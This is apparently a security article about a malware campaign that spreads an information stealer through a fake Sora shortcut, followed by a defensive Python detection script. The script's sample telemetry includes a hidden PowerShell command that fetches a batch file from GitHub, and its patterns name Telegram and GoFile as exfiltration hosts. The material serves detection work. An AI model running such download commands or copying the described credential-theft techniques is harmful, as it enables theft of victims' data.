Threat actors are exploiting the popularity of OpenAI’s Sora, a video generation model, to distribute malware. The campaign uses a Windows shortcut file named “SoraAI.lnk”, dressed up with Sora branding, to lure users into launching a multi-stage infection chain that ends in an information stealer. It is a clear example of social engineering that trades on user trust in well-known AI tools.
Executing the shortcut downloads a batch file from a GitHub repository. That script attempts to download additional payloads in a loop, so the chain still completes if an individual download attempt fails. Later stages run further batch files that install legitimate Python packages, including requests and cryptography, which are then used to run the malicious Python script “python.py”, the core of the malware. This final script establishes persistence by copying itself into the system’s startup folder, so it runs automatically whenever the user logs on.
The chain starts when a user double-clicks the deceptive “SoraAI.lnk” shortcut, which launches a hidden PowerShell process.
The malware’s primary function is to collect and exfiltrate a wide range of sensitive personal and financial data from the infected computer. It extracts browser cookies, saved passwords and user profiles from Chrome, Firefox and Opera. It also collects detailed system information, saved Wi-Fi credentials, cryptocurrency wallet details and configuration data from popular gaming platforms. The harvested data is compressed into a zip archive and sent to the attackers through the Telegram bot API; files larger than 49 MB are instead uploaded to the file-hosting service GoFile.io.
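The stages described above map onto a small set of host and network indicators a defender can look for: a hidden PowerShell spawned from Explorer that fetches a script from GitHub, a pip install of the packages the final script needs, a .py file written to the Startup folder, and a Python process talking to the Telegram bot API or GoFile. The following detection logic is an added example, not code from the article or from the malware; it runs over constructed Sysmon-style events whose field names (`type`, `image`, `parent_image`, `command_line`, `path`, `dest_host`) are assumptions.

```python
import re

STARTUP_RE = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
EXFIL_HOSTS = ("api.telegram.org", "gofile.io")  # Telegram bot API and GoFile, per the article
SUSPECT_PKGS = {"requests", "cryptography"}      # packages the later batch stages install

def is_exfil_host(host):
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in EXFIL_HOSTS)

def analyze(events):
    """Return (rule, detail) tuples for events matching a stage of the chain."""
    findings = []
    for e in events:
        if e["type"] == "process":
            img, cmd = e["image"].lower(), e["command_line"].lower()
            parent = e.get("parent_image", "").lower()
            # Stage 1: shortcut double-click spawns hidden PowerShell that pulls a script from GitHub
            if (img.endswith("powershell.exe") and parent.endswith("explorer.exe")
                    and re.search(r"-w(indowstyle)?\s+hidden", cmd) and "github" in cmd):
                findings.append(("hidden_powershell_github_download", e["command_line"]))
            # Stage 2/3: batch stage installs the packages the final python.py relies on
            if "pip" in cmd and "install" in cmd and SUSPECT_PKGS & set(cmd.split()):
                findings.append(("pip_install_stealer_deps", e["command_line"]))
        elif e["type"] == "file" and e["path"].lower().endswith(".py") and STARTUP_RE.search(e["path"]):
            # Stage 4: a .py script written to the Startup folder for persistence
            findings.append(("python_script_in_startup", e["path"]))
        elif e["type"] == "network" and e["image"].lower().endswith("python.exe") and is_exfil_host(e["dest_host"]):
            # Stage 5: a Python process talking to the article's exfiltration channels
            findings.append(("python_exfil_channel", e["dest_host"]))
    return findings

# Constructed sample telemetry (not real logs); paths and the URL are illustrative placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell.exe -WindowStyle Hidden -c "iwr https://raw.githubusercontent.com/example/repo/main/s.bat -o $env:TEMP\\s.bat"'},
    {"type": "process", "image": r"C:\Users\u\AppData\Local\Programs\Python\Python311\python.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "python.exe -m pip install requests cryptography"},
    {"type": "file", "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\python.py"},
    {"type": "network", "image": r"C:\Users\u\AppData\Local\Programs\Python\Python311\python.exe", "dest_host": "api.telegram.org"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Each rule on its own is noisy (developers run pip install too); correlating two or more of them on the same host within a short window is what makes the chain stand out.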
The chain also scavenges for files with common extensions such as PDF, JPG and TXT in directories like the user’s Downloads and Documents folders, which broadens the potential damage to victims.
As the digital landscape evolves, distinguishing legitimate from malicious online resources has become essential. Users should download files only from trusted sources and verify their authenticity before executing anything unknown. Staying informed about new attack methods and deploying robust antivirus solutions significantly reduces the risk from campaigns like this one.